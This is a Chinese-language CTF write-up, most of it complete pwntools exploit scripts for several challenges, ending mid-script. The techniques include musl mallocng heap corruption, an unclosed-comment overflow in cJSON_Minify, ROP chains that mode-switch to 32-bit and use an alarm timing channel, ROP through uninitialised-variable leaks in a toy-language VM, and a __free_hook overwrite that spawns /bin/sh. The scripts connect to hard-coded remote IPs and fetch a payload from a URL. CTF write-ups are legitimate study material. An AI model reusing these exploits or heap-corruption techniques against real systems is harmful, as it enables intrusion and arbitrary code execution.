p = remote("123.60.76.240", 60001)

def add(name, content, size=-1):
    p.sendlineafter(b"option: ", b"1")
    if size >= 0:
        p.sendlineafter(b"name size: ", str(size).encode())
    else:
        p.sendlineafter(b"name size: ", str(len(name)).encode())
    p.sendafter(b"name: ", name)
    p.sendlineafter(b"note size: ", str(len(content)).encode())
    p.sendafter(b"note content: ", content)
    
def find(name, size=-1):
    p.sendlineafter(b"option: ", b"2")
    if size >= 0:
        p.sendlineafter(b"name size: ", str(size).encode())
    else:
        p.sendlineafter(b"name size: ", str(len(name)).encode())
    p.sendafter(b"name: ", name)
    
def delete(name):
    p.sendlineafter(b"option: ", b"3")
    p.sendlineafter(b"name size: ", str(len(name)).encode())
    p.sendafter(b"name: ", name)
    
def forget():
    p.sendlineafter(b"option: ", b"4")
    
def exit():
    p.sendlineafter(b"option: ", b"5")

def exp():
    ## ------------ leak addr info ------------
    for i in range(3):
        add(bytes([0x41+i])*0xc, bytes([0x61+i])*0x28) # A-C
    for i in range(3):
        find(b"x"*0x28)
    forget()
    add(b"E"*0xc, b"e"*0x28) # E uaf
    # -- new group
    add(b"F"*0xc, b"f"*0x28) # F hold E
    delete(b"E"*0xc)
    add(b"eqqie", b"x"*0x38) # occupy
    
    find(b"E"*0xc)
    
    p.recvuntil(b"0x28:")
    leak_heap = 0
    leak_elf = 0
    for i in range(8):
        leak_heap += int(p.recv(2).decode(), 16) << (i*8)
    for i in range(8):
        leak_elf += int(p.recv(2).decode(), 16) << (i*8)
    elf_base = leak_elf - 0x4fc0
    heap_base = elf_base
    print("leak_heap:", hex(leak_heap))
    print("leak_elf:", hex(leak_elf))
    print("heap_base:", hex(heap_base))
    print("elf_base:", hex(elf_base))
    
    ## ------------ leak libc addr ------------
    read_got = elf_base+0x3fa8
    add(b"Y"*0xc, b"y"*0xc) # occupy
    forget() # fresh all
    add(b"A"*0x4, b"a"*0x4)
    add(b"B"*0x4, b"b"*0x4)
    delete(b"A"*0x4)
    for i in range(7):
        find(b"x"*0x28)
    fake_note = p64(heap_base+0x4cf0) + p64(read_got) # name('aaaa'), content(read@got)
    fake_note += p64(4) + p64(8) # name_size, content_size
    fake_note += p64(0) # next->null    
    add(b"C"*0x4, fake_note) # C occupy last chunk
    find(b"a"*4)
    p.recvuntil(b"0x8:")
    read_got = b""
    for i in range(8):
        read_got += p8(int(p.recv(2).decode(), 16))
    read_got = u64(read_got)
    print("read_got:", hex(read_got))
    libc_base = read_got - 0x74f10
    stdout_used = libc_base + 0xb43b0
    print("libc_base:", hex(libc_base))
    print("stdout_used:", hex(stdout_used))

    for i in range(7):
        add(b"y"*0x4, b"y"*0x4) # run out of chunks
    forget() # fresh all
    
    ## ------------ leak heap secret ------------
    new_heap = libc_base - 0xb5000
    print("new_heap:", hex(new_heap))
    heap_secret_ptr = libc_base + 0xb4ac0
    
    forget() # fresh all
    add(b"A"*0x4, b"a"*0x4)
    add(b"B"*0x4, b"b"*0x4)
    delete(b"A"*0x4)
    for i in range(7):
        find(b"x"*0x28)
    fake_note = p64(heap_base+0x4cb0) + p64(heap_secret_ptr) # name('aaaa'), content(heap_secret)
    fake_note += p64(4) + p64(8) # name_size, content_size
    fake_note += p64(0) # next->null    
    add(b"C"*0x4, fake_note) # C occupy last chunk
    find(b"a"*4)
    p.recvuntil(b"0x8:")
    heap_secret = b""
    for i in range(8):
        heap_secret += p8(int(p.recv(2).decode(), 16))
    print("heap_secret:", heap_secret)
    for i in range(7):
        add(b"y"*0x4, b"y"*0x4) # run out of chunks
    forget() # fresh all
    
    ## ------------ build fake_meta, fake_chunk ------------
    # 关ASLR打本地的时候记得改掉这个偏移
    new_heap2 = libc_base - 0x7000  # aslr_on&remote: 0x7000  aslr_off: 0xd000
    print("new_heap2:", hex(new_heap2))
    add(b"A"*0x4, b"a"*0x4) # A
    ### pointers
    system = libc_base + 0x50a90
    execve = libc_base + 0x4f9c0
    fake_area_addr = new_heap2 + 0x1000
    fake_meta_ptr = fake_area_addr + 0x20
    fake_group_ptr = fake_meta_ptr + 0x30
    fake_iofile_ptr = fake_group_ptr + 0x10
    fake_chunk_ptr = fake_iofile_ptr - 0x8
    print("system:", hex(system))
    print("fake_meta_ptr:", hex(fake_meta_ptr))
    print("fake_group_ptr:", hex(fake_group_ptr))
    print("fake_iofile_ptr:", hex(fake_iofile_ptr))
    ### fake arena
    fake_area = heap_secret + b"M" * 0x18
    ### fake group
    fake_group = p64(fake_meta_ptr)    
    ### fake iofile
    fake_iofile = p64(0) # chunk prefix: index 0, offset 0
    fake_iofile += b"/bin/sh\x00" + b'X' * 32 + p64(0xdeadbeef) + b'X' * 8 + p64(0xbeefdead) + p64(execve) + p64(execve)
    fake_iofile = fake_iofile.ljust(0x500, b"\x00")
    ### fake meta
    fake_meta = p64(fake_iofile_ptr) + p64(stdout_used) # prev, next
    fake_meta += p64(fake_group_ptr)
    fake_meta += p64((1 << 1)) + p64((20 << 6) | (1 << 5) | 1 | (0xfff << 12))
    fake_meta = fake_meta.ljust(0x30)
    ### final payload
    payload = b"z"*(0x1000-0x20)
    payload += fake_area + fake_meta + fake_group + fake_iofile
    payload = payload.ljust(0x2000, b"z")
    add(b"B"*0x4, payload) # check this
    
    delete(b"A"*0x4)
    for i in range(7):
        find(b"x"*0x28)
    ## ------------  build fake_note ------------
    fake_note = p64(heap_base+0x4960) + p64(fake_iofile_ptr) # name(d->content "dddd"), content(free it to unlink!!!)
    fake_note += p64(4) + p64(4) # name_size, content_size
    fake_note += p64(0) # next->null
    add(b"C"*0x4, fake_note) # C occupy last chunk
    add(b"D"*0x4, b"d"*4) # D
    #gdb.attach(p, "dir ./musl-1.2.2/src/malloc\ndir ./musl-1.2.2/src/malloc/mallocng\nb free")
    #pause()
    
    delete(b"d"*0x4)
    p.sendline(b"5")
    
    p.interactive()

if __name__ == "__main__":
    exp()

参考资料:

[1] https://www.anquanke.com/post/id/253566

[2] https://github.com/cscosu/ctf-writeups/tree/master/2021/def_con_quals/mooosl

[3] https://www.anquanke.com/post/id/241101#h2-5

[4] https://www.anquanke.com/post/id/241104

musl 1.2.2 版本的内存管理机制发生了特别大的变化,但是本题用到的所有知识网上都有公开可查的资料了

dataleak

cJSON库里cJSON_Minify函数有个漏洞

void cJSON_Minify(char *json)
{
    char *into=json;
    while (*json)
    {
        if (*json==' ') json++;
        else if (*json=='\t') json++;    /* Whitespace characters. */
        else if (*json=='\r') json++;
        else if (*json=='\n') json++;
        else if (*json=='/' && json[1]=='/')  while (*json && *json!='\n') json++;    
        else if (*json=='/' && json[1]=='*') {while (*json && !(*json=='*' && json[1]=='/')) json++;json+=2;}    /* multiline comments. */
        else if (*json=='\"'){*into++=*json++;while (*json && *json!='\"'){if (*json=='\\') *into++=*json++;*into++=*json++;}*into++=*json++;} 
        else *into++=*json++;            /* All other characters. */
    }
    *into=0;    /* and null-terminate. */
}

多行注释的处理没考虑注释不闭合,可能造成越界读写

相关issue

exp:

from pwn import*

p=remote('124.70.202.226',2101)
#p=process('./cJSON_PWN')
context.log_level='debug'

p.send('aaaa/*'.ljust(0xe,'a'))
#gdb.attach(p)
p.send('/*'.rjust(0xe,'a')) #'this_is_dat'
a=p.recv(0xb)
print(a)

#gdb.attach(p)
p.send('aaaa/*'.ljust(0xe,'a'))
#gdb.attach(p)
p.send('a/*'.ljust(0xe,'a')) #'a_in_server'
b=p.recv(0xb)
print(a+b)

p.interactive()

把栈上存的要你读的数据leak出来,在交互里换flag

Gadget

用纯gadget切换到32位模式绕过沙箱限制打开文件,然后切回64位模式用alarm侧信道爆破flag字符

由于一次可输入的长度不够,这里分成了三段ROP,每段之前先迁移一下栈

exp:

from pwn import *
import time
import sys
import threading

context.arch = "amd64"
#context.log_level = "debug"

flag = {}
lock = threading.Lock()

# addrs
bss = 0x40c000
flag_ch_pos = bss+0x1500
fake_stack = bss+0x1000
fake_stack2 = bss+0x1100
fake_stack3 = bss+0x1200

# gadgets
retfq = 0x4011ec
retf = 0x4011ed
ret = 0x40312c
leave_ret = 0x7ffff7ffde52
pop_rsp_ppp_ret = 0x401730
pop_rdi_rbp = 0x401734
pop_rsi_r15_rbp = 0x401732
pop_rbp_ret = 0x401102
pop_rax_ret = 0x401001
pop_rcx_ret = 0x40117b
pop_rbx_ppp_ret = 0x403072
int_0x80_ret = 0x4011f3
syscall_ret = 0x408865
read_0xc0_gadget = 0x401170
push_rsi_ret = 0x4011c5
int3 = 0x4011eb

alarm_gadget = 0x40115D
'''
.text:000000000040115D                 mov     eax, 25h
.text:0000000000401162                 mov     edi, [rbp-8]    ; seconds
.text:0000000000401165                 syscall                 ; LINUX - sys_alarm
.text:0000000000401167                 pop     rbp
.text:0000000000401168                 retn
'''

def exp(curr_ch):
    # 121.37.135.138 2102
    #p = process("./gadget")
    p = remote("121.37.135.138", 2102)
    
    #gdb.attach(p, "b *0x40119a\nc\n")
    offset = 0x38
    move_stack_payload = b"A"*0x38 + p64(pop_rdi_rbp) + p64(fake_stack)*2 + p64(read_0xc0_gadget)
    #move_stack_payload += p64(leave_ret) # start part1
    move_stack_payload += p64(pop_rsp_ppp_ret) + p64(fake_stack) # start part1
    p.send(move_stack_payload)
    
    # part 1
    time.sleep(1)
    bss_payload = b"./flag\x00\x00" # new rbp 
    bss_payload += p64(0)*2
    bss_payload += p64(retfq) + p64(ret) + p64(0x23) # change to x86
    
    bss_payload += p32(pop_rax_ret) + p32(5) # control eax to SYS_open
    bss_payload += p32(pop_rbx_ppp_ret) + p32(fake_stack) + p32(fake_stack)*3
    bss_payload += p32(pop_rcx_ret) + p32(0)
    bss_payload += p32(int_0x80_ret) # do SYS_open
    
    bss_payload += p32(ret) + p32(retf) + p32(ret) + p32(0x33) # change to x64

    bss_payload += p64(pop_rdi_rbp) + p64(fake_stack2)*2 + p64(read_0xc0_gadget) # read part2
    bss_payload += p64(pop_rsp_ppp_ret) + p64(fake_stack2)  # start part2
    
    #print("len(bss_payload):", hex(len(bss_payload)))  
    p.send(bss_payload)
    
    # part2
    time.sleep(1)
    bss_payload2 = p64(0xdeadbeef) # new rbp
    bss_payload2 += p64(0)*2
    bss_payload2 += p64(pop_rax_ret) + p64(0)  # control rax to SYS_read
    bss_payload2 += p64(pop_rdi_rbp) + p64(3) + p64(0xdeadbeef) # fd

    bss_payload2 += p64(pop_rsi_r15_rbp) + p64(flag_ch_pos-curr_ch) + p64(0)*2
    bss_payload2 += p64(syscall_ret) # do SYS_read
    bss_payload2 += p64(pop_rdi_rbp) + p64(flag_ch_pos+1) + p64(0) + p64(read_0xc0_gadget) # rewrite high bits
    
    bss_payload2 += p64(pop_rdi_rbp) + p64(fake_stack3)*2 + p64(read_0xc0_gadget) # read part3
    bss_payload2 += p64(pop_rsp_ppp_ret) + p64(fake_stack3)  # start part3
    
    #print("len(bss_payload2):", hex(len(bss_payload2)))  
    p.send(bss_payload2)
    
    # rewrite
    time.sleep(1)
    p.send(b"\x00"*0x7)
    #p.send(p64(7))
    
    # part3
    time.sleep(1)
    bss_payload3 = p64(0xdeadbeef) # new rbp
    bss_payload3 += p64(0)*2
    bss_payload3 += p64(pop_rbp_ret) + p64(flag_ch_pos+8)
    bss_payload3 += p64(alarm_gadget) # alarm gadget
    bss_payload3 += p64(0xdeadbeef) # padding
    
    bss_payload3 += p64(pop_rsi_r15_rbp) + p64(push_rsi_ret) + p64(0)*2
    bss_payload3 += p64(push_rsi_ret) # blocking

    #print("len(bss_payload3):", hex(len(bss_payload3)))  
    p.send(bss_payload3)
    
    start = time.time()
    for i in range(1000):
        try:
            p.send(b"a")
        except:
            end = time.time()
            time_used = int(end-start)
            print(f"[ROUND {curr_ch}] Time used:", end-start)
            print(f"[ROUND {curr_ch}] CHAR: '{chr(time_used)}' ({hex(time_used)})")
            lock.acquire()
            flag[curr_ch] = chr(time_used)
            lock.release()
            return
        finally:
            time.sleep(0.3)
    print(f"[ROUND {curr_ch}] ERROR")
    p.close()
    return

if __name__ == "__main__":
    pool = []
    for _round in range(33):
        th = threading.Thread(target=exp, args=(_round, ))
        th.setDaemon = True
        pool.append(th)
        th.start()
    for th in pool:
        th.join()
    flag = {k: v for k, v in sorted(flag.items(), key=lambda item: item[0])}    
    print(flag)
    flag_str = ""
    for k, v in flag.items():
        flag_str = flag_str + v
    print(flag_str)

Christmas Song

题目给了编译器源代码,./com目录下有词法和语法定义(lex+yacc)的源文件,从源文件逆出语法;

scanner.l

%{
#include "com/ast.h"
#define YYSTYPE ast_t *
#include <stdio.h>
#include "parser.h"
int line = 1;
%}
%option noyywrap


%%
";"             {return NEW_LINE;}
":"             {return NEXT;}
"is"            {yylval=ast_operator_init('=');return OPERATOR;}
"gift"          {return GIFT;}
"reindeer"      {return REINDEER;}
"equal to"      {yylval=ast_operator_init('?'); return OPERATOR;}
"greater than"  {yylval=ast_operator_init('>'); return OPERATOR;}
"if the gift"   {return IF;}
"delivering gift"    {return DELIVERING;}
"brings back gift"   {return BACK;}
"this family wants gift"                {return WANT;}
"ok, they should already have a gift;"  {return ENDWANT;}
"Brave reindeer! Fear no difficulties!" {yylval=ast_init_type(AST_AGAIN);return AGAIN;}

<<EOF>>         {return 0;}

[ ]             {/* empty */}
[\n]            {line++;}
[-+*/]          {yylval=ast_operator_init(yytext[0]); return OPERATOR;}
[a-zA-Z]+       {yylval=ast_word_init(yytext); return WORD;}
[0-9]+          {yylval=ast_number_init(yytext); return NUMBER;}
\"([^\"]*)\"    {yylval=ast_string_init(yytext); return STRING;}
(#[^#]*#)       {/* empty */}
%%

void yyerror(ast_t **modlue,const char *msg) {
    printf("\nError at %d: %s\n\t%s\n", line, yytext, msg);
    exit(1);
}

parser.y

%{
#include "com/ast.h"
#define YYSTYPE ast_t *
#include <stdio.h>
extern int yylex (void);
void yyerror(ast_t **modlue, const char*);
%}

%parse-param { ast_t **module}

%token GIFT REINDEER DELIVERING BACK STRING
%token WORD NEW_LINE NUMBER OPERATOR
%token AGAIN IF WANT ENDWANT NEXT 


%%
proprame    :   stmts   
                {$$ = *module = $1;}
            ;
stmts   :   stmt 
                {$$ = ast_init(AST_STMT, 1, $1);}
        |   stmts stmt
                {$$ = ast_add_child($1, $2);}
        ;
stmt    :   call_expr 
        |   want_stmt
        |   var_expr NEW_LINE
                {$$ = $1;} 
        ;

want_stmt :     WANT WORD lists ENDWANT  
                {$$ = ast_init(AST_WANT, 2, $2, $3);}
        ;

lists    :  list 
                {$$ = ast_init(AST_LISTS, 1, $1);}
        |  lists list 
                {$$ = ast_add_child($1, $2);}
        ;

list    :  IF OPERATOR expr NEXT stmts
                {$$ = ast_init(AST_LIST, 3, $2, $3, $5);}
        | list AGAIN 
                {$$ = ast_add_child($1, $2);}

call_expr   : call_expr BACK WORD NEW_LINE 
                {$$ = ast_add_child($1, $3);}
            | call_expr NEW_LINE 
                {$$ = $1;}
            | REINDEER WORD DELIVERING WORD WORD WORD  
                {$$ = ast_init(AST_FUNCTION, 4, $2, $4, $5, $6);}
            ;

var_expr    : GIFT expr  
                {$$=$2;}
            ;

expr    :   expr OPERATOR expr    
                {$$=ast_init(AST_EXPR, 3, $1, $2, $3);}
        |   WORD               
                {$$=$1;}
        |   NUMBER             
                {$$=$1;}
        |   STRING 
                {$$=$1;}
        ;
%%

这个编译器实际上将源文件编译成了一个虚拟指令集构成的二进制文件,使用-r参数可以放到vm里面运行,检查了一下vm主要利用点在这:

void vm_opcode_call(arg){
    char *func = get_word;
    u_int64_t arg3 = pop;
    u_int64_t arg2 = pop;
    u_int64_t arg1 = pop;
    u_int64_t ret;

    if (is_func("Rudolph")){
        // ret = write(arg1, arg2, arg3);
        // No talking while singing Christmas Songs
        printf("error: \n%s\n", rudolph);
    }
    if (is_func("Dasher")){
        ret = read(arg1, arg2, arg3);
    }
    if (is_func("Dancer")){
        ret = open(arg1, arg2, arg3);
        if((int)ret < 0){
            printf("error con't open file %s\n", arg1);
            exit(EXIT_FAILURE);
        }
    }
    if (is_func("Prancer")){
        ret = strncmp(arg1, arg2, arg3);
    }
    if (is_func("Vixen")){
        ret = memcpy(arg1, arg2, arg3);
    }
    push(ret);
}
  1. 给了open和read,虽然没给wirte,但是可以从open的参数报错把flag打印出来;
  2. 构造利用的时候关键点在于leak,观察可以发现vm_opcode_call里面的局部变量ret没有初始化,也就是说首次进入vm_opcode_call只要不触发任何内置函数,就可以把ret的值泄露出来;泄露出来是一个堆上的可写地址,加偏移找一块空地作为BUF;
  3. 往BUF读文件名,然后读FLAG到BUF上,最后通过报错打印即可拿到FLAG
  • 1.slang
gift NULL is 0;
gift FD is 0;
gift C is 4096;
gift RN is 32;
gift E is 0;
reindeer EQQIE delivering gift NULL NULL NULL brings back gift LEAK;
gift BUF is LEAK+12288;

reindeer Dasher delivering gift FD BUF RN;

reindeer Dancer delivering gift BUF NULL NULL brings back gift FILEFD;
gift FLAGLEN is 30;
reindeer Dasher delivering gift FILEFD BUF FLAGLEN;
reindeer Dancer delivering gift BUF NULL NULL;
  • remote.py
from pwn import *

p = remote("124.71.144.133", 2144)
#p = process(["python3", "server.py"])
context.log_level = "debug"

with open("./1.slang", "rb") as f:
    p.sendline(f.read())
p.sendline(b"EOF")

pause(1)
p.send(b"/home/ctf/flag\x00")
#p.shutdown("send")

p.interactive()

Christmas Bash

相比于上一题题目恢复了 write 调用:

if (is_func("Rudolph")){
    ret = write(arg1, arg2, arg3);
    // No talking while singing Christmas Songs
    // printf("error: \n%s\n", rudolph);
}

并且预设了一个名为sleep的变量,该变量保存了sleep函数的地址(位于libc):

gift_t * gift = gift_init("sleep", sleep);
runtime_set_gift(r, gift);

个人的非预期解法:

  1. 与之前相同,通过未初始化的 ret 泄露出堆地址;借助 sleep 函数可以得到 libc 地址
  2. 目标是打 vm_lambda_call 的返回地址进行 rop,于是想要泄露 environ
  3. 但是这个语言没有提供解引用的功能,计算出 environ 的地址后不能很方便的把里面的值读到某个变量
  4. 由于 strncmp 在比较两个不相等字符时会做减法然后返回差值,于是只要用一个空字串和 environ 逐字节比较就可以一个一个字节泄露出栈地址
  5. 泄露出栈地址后计算 vm_lambda_call 的返回地址,这里注意,参数个数不同会导致初始化栈上指针数量不通,从而导致栈偏移不同,写 exp 测试的时候应该按照加了 -r 参数的命令行来测试
  6. 计算各种 gadget 地址并保存到变量,计算出这些变量在堆上的地址(这一步堆布局是动态变化的,和语法树大小有关);将这个地址和目标栈地址放到 memncpy 进行拷贝,布置 ROP 链
  7. 结束程序前输出一次 "hello" ,这样才能进到第二次执行,在第一次执行的时候输出是被关掉的(两次执行的输入输出都被关掉了,所以EXP没有采用交互方式)
result = subprocess.check_output("/home/ctf/Christmas_Bash -r {} < /dev/null".format(filename), shell=True)
if (result.decode() == "hello"):
    socket_print("wow, that looks a bit unusual, I'll try to decompile it and see.")
    os.system("/home/ctf/Christmas_Bash -r {} -d {} < /dev/null".format(filename, filename))
else:
    socket_print("Hahahahahahahahahahahahaha, indeed, you should also continue to learn Christmas songs!")
clean(filename);
  1. 最开始做的时候考虑到第一次不能读出flag导致无法进入第二次有输出的执行,于是借助了一个随机地址的字节,通过判断这个字节和127的大小关系可以得到一个二分之一的概率,总体而言就有四分之一的概率可以拿到flag(后来发现栈偏移问题后才知道这一步是多余的...一度以为这是考点)

exp.slang

gift NULL is 0;
gift NULSTR is "";
gift STDIN is 0;
gift STDOUT is 1;
gift RN is 32;
gift WNLEAK is 8;
gift CMPLEN is 1;
gift SHIFT is 256;
gift HELLO is "hello";
gift HELLOLEN is 5;

reindeer EQQIE delivering gift NULL NULL NULL brings back gift LEAK;
gift HEAPBASE is LEAK-1152;
gift BUF is HEAPBASE+12288;
gift LIBCBASE is sleep-972880;
gift EXECVE is LIBCBASE+975632;
gift ENVIRON is LIBCBASE+2232000;
gift TMP is ENVIRON;
gift STACKLEAK is 0;


reindeer Prancer delivering gift TMP NULSTR CMPLEN brings back gift BYTELEAK;
gift TMP is TMP+1;
gift STACKLEAK is BYTELEAK+STACKLEAK*1;
reindeer Prancer delivering gift TMP NULSTR CMPLEN brings back gift BYTELEAK;
gift TMP is TMP+1;
gift STACKLEAK is STACKLEAK+BYTELEAK*256;
reindeer Prancer delivering gift TMP NULSTR CMPLEN brings back gift BYTELEAK;
gift RANDBYTE is BYTELEAK;
gift TMP is TMP+1;
gift STACKLEAK is STACKLEAK+BYTELEAK*256*256;
reindeer Prancer delivering gift TMP NULSTR CMPLEN brings back gift BYTELEAK;
gift TMP is TMP+1;
gift STACKLEAK is STACKLEAK+BYTELEAK*256*256*256;
reindeer Prancer delivering gift TMP NULSTR CMPLEN brings back gift BYTELEAK;
gift TMP is TMP+1;
gift STACKLEAK is STACKLEAK+BYTELEAK*256*256*256*256;
reindeer Prancer delivering gift TMP NULSTR CMPLEN brings back gift BYTELEAK;
gift TMP is TMP+1;
gift STACKLEAK is STACKLEAK+BYTELEAK*256*256*256*256*256;

gift MAINRET is STACKLEAK-1200;
gift MAINRETA is MAINRET+8;
gift MAINRETB is MAINRET+16;
gift MAINRETC is MAINRET+24;
gift MAINRETD is MAINRET+32;
gift MAINRETE is MAINRET+40;
gift MAINRETF is MAINRET+48;
gift POPRDIRET is LIBCBASE+190149;
gift POPRSIRET is LIBCBASE+196737;
gift POPRDXRET is LIBCBASE+1180274;
gift CMD is "/home/ctf/getflag";
gift EXECVEPTR is HEAPBASE+9768;
gift GADGETAPTR is HEAPBASE+10600;
gift GADGETBPTR is HEAPBASE+10600+32;
gift GADGETCPTR is HEAPBASE+10600+64;
gift CMDPTR is HEAPBASE+10696;

reindeer Dasher delivering gift STDIN BUF NULL;

gift AAAA is 0;
gift BBBB is 0;
gift CCCC is 0;
gift DDDD is 0;
gift EEEE is 0;
gift FFFF is 0;
gift GGGG is 0;

this family wants gift AAAA if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRET GADGETAPTR WNLEAK 
ok, they should already have a gift;

this family wants gift BBBB if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRETA CMDPTR WNLEAK;
ok, they should already have a gift;

this family wants gift CCCC if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRETB GADGETBPTR WNLEAK;
ok, they should already have a gift;

this family wants gift DDDD if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRETC NULSTR WNLEAK;
ok, they should already have a gift;

this family wants gift EEEE if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRETD GADGETCPTR WNLEAK;
ok, they should already have a gift;

this family wants gift FFFF if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRETE NULSTR WNLEAK;
ok, they should already have a gift;

this family wants gift GGGG if the gift is RANDBYTE greater than 127:
reindeer Vixen delivering gift MAINRETF EXECVEPTR WNLEAK;
ok, they should already have a gift;


reindeer Rudolph delivering gift STDOUT HELLO HELLOLEN;

exp.py

from pwn import *
# context.log_level = "debug"

while True:
    p = remote("121.36.254.255", 2155)
    
    p.recvuntil(b"please input your flag url:")
    p.sendline(b"http://app.eqqie.cn/3.scom")
    p.interactive()

babyFMT

以为是个普通的格式化串题,结果是出题人自己实现了一个格式化输入(babyscanf)和输出(babyprintf

漏洞点:

  • 一个是在show()里面可以自定义输出用的格式化串,但是光有这个是无法利用的,需要结合另一个漏洞点
  • 另一个是在babyprintf()中,这里最开始缓冲区大小的确定方式是:首先获取格式化串原长(用的strlen),先进行一次遍历,每遍历到一个%就把需要的长度+0x10,最后交给malloc来获得存放输出流用的buffer;反复审计了几次发现使用b"%\x00"形式的格式化串可以欺骗strlen同时不会导致格式化串解析的终止。于是当我们使用%r——类似scanf中的%s时就会造成以外的堆溢出覆盖

利用:

  • 溢出理论可行,但是格式化串的buffer在解析完后会释放,所以要准确控制堆溢出位置还是有点麻烦的
  • 我采用的堆风水思路是控制buffer循环使用低地址的一个0x30堆块,在其后构造几个0x50的堆块,通过溢出修改size进行overlap;overlap之后就顺理成章能使用UAF来修改0x50fasbin中的fd指针指向__free_hook
  • 这里之所以选择一个较大的堆块(0x50)去做控制是因为在__free_hook被修改为system之后并不能立马发生system("/bin/sh"),需要手动去执行一次show()逻辑,在最后释放格式化串buffer的时候再触发system("/bin/sh");这个过程中会发生几次固定的babyprintf()调用,这里如果碰到了被破坏的堆结构会触发异常,所以需要绕掉

EXP:

from pwn import *

#p = process("./babyFMT", env={"LD_PRELOAD":"./libc-2.31.so"})
p = remote("43.155.72.106", 9999)
elf = ELF("./libc-2.31.so")
context.log_level = "debug"

def add(size:int, author, content):
    p.sendlineafter(b">", b"1")
    p.sendlineafter(b"Size:", b"Content size is "+str(size).encode())
    p.sendlineafter(b"Author:", b"Book author is "+author)
    p.sendlineafter(b"Content:", b"Book content is "+content)
    
def delete(idx:int):
    p.sendlineafter(b">", b"2")
    #p.sendafter(b"Idx:", b"Book idx is "+str(idx).encode()+b" ")
    p.sendlineafter(b"Idx:", b"Book idx is "+str(idx).encode())
    
def show(idx:int, fmt):
    p.sendlineafter(b">", b"3")
    p.sendlineafter(b"Idx:", b"Book idx is "+str(idx).encode())
    p.sendlineafter(b"You can show book by yourself\n", b"My format "+fmt)
    

# base: 0x0000555555554000+0x4060

def exp():
    # leak
    ## leak libc
    add(0x20, b"xxxx", b"xxxx") # 0 bad chunk
    add(0x410, b"aaaa", b"bbbb") # 1
    add(0x20, b"tttt", b"tttt") # 2 split
    delete(1)
    add(0x20, b"b", b"b") #1
    show(1, b"%r|%m|%r")
    libc_leak = p.recv(6).ljust(8, b"\x00")
    libc_leak = u64(b"\xe0"+libc_leak[1:])
    libc_base = libc_leak - 0x470 - elf.symbols[b"__malloc_hook"]
    free_hook = libc_base + elf.symbols[b"__free_hook"]
    system = libc_base + elf.symbols[b"system"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    
    ## attack tcache
    ## b"AAAAAAAAAA%m%m%r"
    add(0x360, b"x"*0x10, b"xxxx") # 3 clean unsorted bin
    add(0x10, b"xxxx", b"xxxx") # 4 clean 0x30 bin
    add(0x20, b"xxxx", b"xxxx") # 5 clean 0x40 bin
    
    add(0x10, b"6666", b"cccc") # 6
    add(0x30, b"7777", b"cccc") # 7
    add(0x30, b"8888", b"cccc") # 8
    add(0x30, b"9999", b"cccc") # 9
    add(0x30, b"9999", b"cccc") # 10
    add(0x100, b"x"*0x10, b"\x61") #11
    delete(6)
    show(11, b"A"*8+b"%\x00"+b"A"*0x18+b"A"*0x8+b"\xa1") # resize
    
    delete(10)
    delete(9)
    delete(8)
    delete(7) # resized
    
    add(0x80, b"rrrr", b"A"*0x38+p64(free_hook-0x20)[:6]) # 6
    
    ## fetch
    add(0x30, b"tttt", b"tttt") # 7
    add(0x30, b"A"*0x10, b"A"*0x8+p64(system)[:6]) # 10
    
    print("free_hook:", hex(free_hook))
    print("system:", hex(system))
    
    # get shell
    p.sendline(b"3")
    p.sendline(b"Book idx is 7")
    p.sendline(b"My format /bin/sh; ")

    
    p.interactive()

if __name__ == "__main__":
    exp()

slow-spn

本题里面cacheLine是一个缓存单元的类型,__maccess()函数负责检查cacheLine是否命中,以及置换掉最少命中次数的cacheLine

思路:侧信道泄露+爆破

struct cacheLine
{
  uint32_t tag;
  uint32_t last_used;
};
key = flag[0:6]
plain = flag[6:10]
                          k>>n*4
                             ↓
plaintext -> |SS| -> |P| -> XOR -> ... -> |SS| -> |P| -> cipher

... --> |SS| --(vuln)--> |&cache| --> |P| --> ...

getflag的脚本

from pwn import *
from hashlib import sha256
from pwnlib.util.iters import mbruteforce

context.log_level = 'debug'
def pow(p):
    p.recvuntil(b"hashlib.sha256( x + \"")
    c = p.recvuntil("\"" , drop = True)
    print(c)
    proof = mbruteforce(lambda x: sha256(x.encode() + c).hexdigest()[:6] == '000000'
                        , '0123456789', length=8, method='fixed')
    p.sendline(proof)
def getflag(key , m):
    p.recvuntil(b'Input possible spn key (hex):')
    p.sendline(key)
    p.recvuntil(b'Input possible spn plaintext (hex):')
    p.sendline(m)
    res = p.recv()
    if res == b'Wrong.':
        return 0
    else:
        print(res)


p = remote('124.71.173.176' ,8888)
pow(p)
getflag('11' , '1111')

脚本比较乱就贴个爆第一轮的上来好了,后面差不多:

#exp_round1.py
from pwn import *
import sys
from chall import ss_box, p_box, ss_box_addr, p_box_addr
from time import time, sleep
import threading

ss_map = defaultdict(list)
p_map = defaultdict(list)
stop_flag = False

#context.log_level = "debug"

class MyThread(threading.Thread):  
    def __init__(self, func, args=()):  
        super(MyThread, self).__init__()  
        self.func = func  
        self.args = args  
  
    def run(self):  
        self.result = self.func(*self.args)
  
    def get_result(self):  
        try:  
            return self.result  
        except Exception as e:  
            return None  

    def get_args(self, _idx=None):
        return self.args if _idx == None else self.args[_idx]
            
class MyPipe:
    def __init__(self, _addr, _typ="local"):
        if _typ == "local":
            self.raw_p = process(_addr)
        else:
            self.raw_p = remote(_addr[0], _addr[1])
    
    def maccess(self, addr, speed):
        print(f"Addr: {addr}")
        print(f"Fetch cache: {hex((addr>>5) & 0x1F)}\nCache tag: {hex(addr>>10)}")
        self.raw_p.sendlineafter(b"What to do?\n", b"1")
        self.raw_p.sendlineafter(b"Where?\n", str(addr).encode())
        self.raw_p.sendlineafter(b"Speed up?\n", str(speed).encode())

    def conti(self):
        self.raw_p.sendlineafter(b"What to do?\n", b"2")
       
    def leave(self):
        self.raw_p.sendlineafter(b"What to do?\n", b"3")
        
    def skip(self):
        self.raw_p.sendlineafter(b"What to do?\n", b"4")

    def recv(self, num=2048):
        return self.raw_p.recv(num)

    def recvall(self):
        return self.raw_p.recvall()

    def close(self):
        self.raw_p.close()
    
def calc_cacheline(addr:int):
    return (addr>>5) & 0x1F

def calc_tag(addr:int):
    return (addr>>10)
    
def map_i(addr):
    return (calc_cacheline(addr), calc_tag(addr))
    
